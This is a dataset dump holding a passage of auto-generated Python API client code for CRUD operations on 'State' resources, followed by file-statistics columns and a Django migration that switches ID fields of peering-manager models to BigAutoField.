(data) = cls._delete_state_by_id_with_http_info(state_id, **kwargs)
return data
@classmethod
def _delete_state_by_id_with_http_info(cls, state_id, **kwargs):
"""Delete State
Delete an instance of State by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_state_by_id_with_http_info(state_id, async=True)
>>> result = thread.get()
:param async bool
:param str state_id: ID of state to delete. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['state_id']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'state_id' is set
if ('state_id' not in params or
params['state_id'] is None):
raise ValueError("Missing the required parameter `state_id` when calling `delete_state_by_id`")
collection_formats = {}
path_params = {}
if 'state_id' in params:
path_params['stateId'] = params['state_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/states/{stateId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def get_state_by_id(cls, state_id, **kwargs):
"""Find State
Return single instance of State by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_state_by_id(state_id, async=True)
>>> result = thread.get()
:param async bool
:param str state_id: ID of state to return (required)
:return: State
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._get_state_by_id_with_http_info(state_id, **kwargs)
else:
(data) = cls._get_state_by_id_with_http_info(state_id, **kwargs)
return data
@classmethod
def _get_state_by_id_with_http_info(cls, state_id, **kwargs):
"""Find State
Return single instance of State by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_state_by_id_with_http_info(state_id, async=True)
>>> result = thread.get()
:param async bool
:param str state_id: ID of state to return (required)
:return: State
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['state_id']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'state_id' is set
if ('state_id' not in params or
params['state_id'] is None):
raise ValueError("Missing the required parameter `state_id` when calling `get_state_by_id`")
collection_formats = {}
path_params = {}
if 'state_id' in params:
path_params['stateId'] = params['state_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/states/{stateId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='State',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def list_all_states(cls, **kwargs):
"""List States
Return a list of States
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_all_states(async=True)
>>> result = thread.get()
:param async bool
:param int page: page number
:param int size: page size
:param str sort: page order
:return: page[State]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._list_all_states_with_http_info(**kwargs)
else:
(data) = cls._list_all_states_with_http_info(**kwargs)
return data
@classmethod
def _list_all_states_with_http_info(cls, **kwargs):
"""List States
Return a list of States
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_all_states_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param int page: page number
:param int size: page size
:param str sort: page order
:return: page[State]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'size', 'sort']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
if 'page' in params:
query_params.append(('page', params['page']))
if 'size' in params:
query_params.append(('size', params['size']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/states', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='page[State]',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def replace_state_by_id(cls, state_id, state, **kwargs):
"""Replace State
Replace all attributes of State
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.replace_state_by_id(state_id, state, async=True)
>>> result = thread.get()
:param async bool
:param str state_id: ID of state to replace (required)
:param State state: Attributes of state to replace (required)
:return: State
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._replace_state_by_id_with_http_info(state_id, state, **kwargs)
else:
(data) = cls._replace_state_by_id_with_http_info(state_id, state, **kwargs)
return data
@classmethod
def _replace_state_by_id_with_http_info(cls, state_id, state, **kwargs):
"""Replace State
Replace all attributes of State
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.replace_state_by_id_with_http_info(state_id, state, async=True)
>>> result = thread.get()
:param async bool
:param str state_id: ID of state to replace (required)
:param State state: Attributes of state to replace (required)
:return: State
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['state_id', 'state']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'state_id' is set
if ('state_id' not in params or
params['state_id'] is None):
raise ValueError("Missing the required parameter `state_id` when calling `replace_state_by_id`")
# verify the required parameter 'state' is set
if ('state' not in params or
params['state'] is None):
raise ValueError("Missing the required parameter `state` when calling `replace_state_by_id`")
collection_formats = {}
path_params = {}
if 'state_id' in params:
path_params['stateId'] = params['state_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'state' in params:
body_params = params['state']
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/states/{stateId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='State',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def update_state_by_id(cls, state_id, state, **kwargs):
"""Update State
Update attributes of State
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_state_by_id(state_id, state, async=True)
>>> result = thread.get()
:param async bool
:param str state_id: ID of state to update. (required)
:param State state: Attributes of state to update. (required)
:return: State
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._update_state_by_id_with_http_info(state_id, state, **kwargs)
else:
(data) = cls._update_state_by_id_with_http_info(state_id, state, **kwargs)
return data
@classmethod
def _update_state_by_id_with_http_info(cls, state_id, state, **kwargs):
"""Update State
Update attributes of State
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_state_by_id_with_http_info(state_id, state, async=True)
>>> result = thread.get()
:param async bool
:param str state_id: ID of state to update. (required)
:param State state: Attributes of state to update. (required)
:return: State
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['state_id', 'state']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'state_id' is set
if ('state_id' not in params or
params['state_id'] is None):
raise ValueError("Missing the required parameter `state_id` when calling `update_state_by_id`")
# verify the required parameter 'state' is set
if ('state' not in params or
params['state'] is None):
raise ValueError("Missing the required parameter `state` when calling `update_state_by_id`")
collection_formats = {}
path_params = {}
if 'state_id' in params:
path_params['stateId'] = params['state_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'state' in params:
body_params = params['state']
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/states/{stateId}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='State',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 31.514586
| 108
| 0.588122
| 3,150
| 27,008
| 4.791111
| 0.060317
| 0.027829
| 0.019679
| 0.028624
| 0.848595
| 0.8152
| 0.802876
| 0.796382
| 0.781407
| 0.781407
| 0
| 0.000488
| 0.316499
| 27,008
| 856
| 109
| 31.551402
| 0.817064
| 0.029991
| 0
| 0.653595
| 0
| 0
| 0.126649
| 0.023972
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.010893
| null | null | 0.004357
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
908ce460d25097704e571633ea64c9b238be4e9f
| 2,707
|
py
|
Python
|
peering/migrations/0072_auto_20210420_2144.py
|
maznu/peering-manager
|
d249fcf530f4cc48b39429badb79bc203e0148ba
|
[
"Apache-2.0"
] | 173
|
2020-08-08T15:38:08.000Z
|
2022-03-21T11:35:25.000Z
|
peering/migrations/0072_auto_20210420_2144.py
|
maznu/peering-manager
|
d249fcf530f4cc48b39429badb79bc203e0148ba
|
[
"Apache-2.0"
] | 247
|
2017-12-26T12:55:34.000Z
|
2020-08-08T11:57:35.000Z
|
peering/migrations/0072_auto_20210420_2144.py
|
maznu/peering-manager
|
d249fcf530f4cc48b39429badb79bc203e0148ba
|
[
"Apache-2.0"
] | 63
|
2017-10-13T06:46:05.000Z
|
2020-08-08T00:41:57.000Z
|
# Generated by Django 3.2 on 2021-04-20 19:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("peering", "0071_auto_20210321_1843"),
]
operations = [
migrations.AlterField(
model_name="autonomoussystem",
name="id",
field=models.BigAutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
migrations.AlterField(
model_name="bgpgroup",
name="id",
field=models.BigAutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
migrations.AlterField(
model_name="community",
name="id",
field=models.BigAutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
migrations.AlterField(
model_name="configuration",
name="id",
field=models.BigAutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
migrations.AlterField(
model_name="directpeeringsession",
name="id",
field=models.BigAutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
migrations.AlterField(
model_name="email",
name="id",
field=models.BigAutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
migrations.AlterField(
model_name="internetexchange",
name="id",
field=models.BigAutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
migrations.AlterField(
model_name="internetexchangepeeringsession",
name="id",
field=models.BigAutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
migrations.AlterField(
model_name="router",
name="id",
field=models.BigAutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
migrations.AlterField(
model_name="routingpolicy",
name="id",
field=models.BigAutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
]
| 32.22619
| 87
| 0.542298
| 238
| 2,707
| 5.987395
| 0.201681
| 0.084211
| 0.175439
| 0.203509
| 0.779649
| 0.779649
| 0.779649
| 0.779649
| 0.779649
| 0.779649
| 0
| 0.017114
| 0.35242
| 2,707
| 83
| 88
| 32.614458
| 0.795779
| 0.015885
| 0
| 0.779221
| 1
| 0
| 0.077385
| 0.01991
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012987
| 0
| 0.051948
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.